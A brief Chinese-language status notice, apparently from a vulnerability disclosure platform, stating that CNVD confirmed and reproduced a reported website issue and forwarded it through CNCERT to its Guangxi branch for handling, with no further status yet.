CNVD确认并复现所述情况,已经转由CNCERT下发给广西分中心,由其后续协调网站管理单位处置.
最新状态:
暂无